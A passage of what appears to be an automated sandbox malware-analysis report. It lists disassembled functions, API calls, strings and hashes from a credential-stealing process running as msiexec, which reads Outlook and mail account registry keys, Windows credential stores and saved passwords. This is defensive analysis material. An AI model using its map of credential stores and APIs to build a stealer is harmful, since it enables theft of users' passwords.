                                                              Function 0040FB00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 101registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                              • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                              • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE$`{g
                                                              • API String ID: 3718511928-4086730951
                                                              • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                              • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                              Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                              • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                              • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                              • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                              Strings
                                                              • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                              • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                              • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                              • API String ID: 1640410171-2022683286
                                                              • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                              • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                              • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                              • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                              Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                              • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                              • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$strlen
                                                              • String ID: -journal$-wal$immutable$nolock
                                                              • API String ID: 2619041689-3408036318
                                                              • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                              • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                              • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                              • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                              Function 00402C5D Relevance: 15.1, APIs: 4, Strings: 6, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00402C9D
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • memset.MSVCRT ref: 00402CF7
                                                              • sprintf.MSVCRT ref: 00402D10
                                                              • sprintf.MSVCRT ref: 00402D4E
                                                                • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$sprintf$Enum
                                                              • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username$`{g
                                                              • API String ID: 4097761685-1427485370
                                                              • Opcode ID: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
                                                              • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                              • Opcode Fuzzy Hash: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
                                                              • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                              Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$strlen
                                                              • String ID:
                                                              • API String ID: 667451143-3916222277
                                                              • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                              • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                              • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                              • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                              Function 0040F460 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 180registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F567
                                                              • memset.MSVCRT ref: 0040F57F
                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                              • String ID: $`{g
                                                              • API String ID: 78143705-3824398969
                                                              • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                              • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                              Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              • wcslen.MSVCRT ref: 0040874A
                                                              • wcsncmp.MSVCRT ref: 00408794
                                                              • memset.MSVCRT ref: 0040882A
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                              • wcschr.MSVCRT ref: 0040889F
                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID: J$Microsoft_WinInet
                                                              • API String ID: 3318079752-260894208
                                                              • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                              • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                              • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                              • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                              Function 0040F802 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 118registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F84A
                                                              • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                              • LocalFree.KERNEL32(?), ref: 0040F92C
                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                              • String ID: Creds$`{g$ps:password
                                                              • API String ID: 2290531041-361185649
                                                              • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                              • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                              • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                              • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                              Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004037EB
                                                              • memset.MSVCRT ref: 004037FF
                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              • strchr.MSVCRT ref: 0040386E
                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                              • strlen.MSVCRT ref: 00403897
                                                              • sprintf.MSVCRT ref: 004038B7
                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                              • String ID: %s@yahoo.com
                                                              • API String ID: 2240714685-3288273942
                                                              • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                              • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                              Function 004108A4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,?), ref: 004108C3
                                                              • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                              • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                              • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                              Strings
                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeFromStringTaskUuidmemcpy
                                                              • String ID: 220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F
                                                              • API String ID: 2208953623-202910704
                                                              • Opcode ID: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                                              • Instruction ID: d39aacb0d07447bcfd979039f79cad875a94fb0475638bd6baea4f5a046d65b4
                                                              • Opcode Fuzzy Hash: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                                              • Instruction Fuzzy Hash: 6B2192B391411DAAEF11AF61DD40EEF3BACEF15354F004023F956E6211E6B8D981CBA5
                                                              Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                              • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                              • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                              • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                              Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                              • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                              • strlen.MSVCRT ref: 00406CCC
                                                              • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                              • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 2881943006-572158859
                                                              • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                              • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                              • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                              • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                              Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 888011440-2039793938
                                                              • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                              • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                              Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • unable to open database: %s, xrefs: 0042EBD6
                                                              • database is already attached, xrefs: 0042EA97
                                                              • cannot ATTACH database within transaction, xrefs: 0042E966
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                              • out of memory, xrefs: 0042EBEF
                                                              • too many attached databases - max %d, xrefs: 0042E951
                                                              • database %s is already in use, xrefs: 0042E9CE
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                              • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                              • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                              • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                              Function 00409C1C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409C53
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00409C6F
                                                              • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                              • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409D3D
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 00409D47
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409D7F
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                              • String ID: 0wE$d
                                                              • API String ID: 2915808112-1552800882
                                                              • Opcode ID: 583de707addaa969329ba30793de7e83f95f566a01afaa3ae0a642996af24538
                                                              • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                              • Opcode Fuzzy Hash: 583de707addaa969329ba30793de7e83f95f566a01afaa3ae0a642996af24538
                                                              • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                              Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                              • strchr.MSVCRT ref: 0040327B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringstrchr
                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                              • API String ID: 1348940319-1729847305
                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                              Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                              • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                              • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                              Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
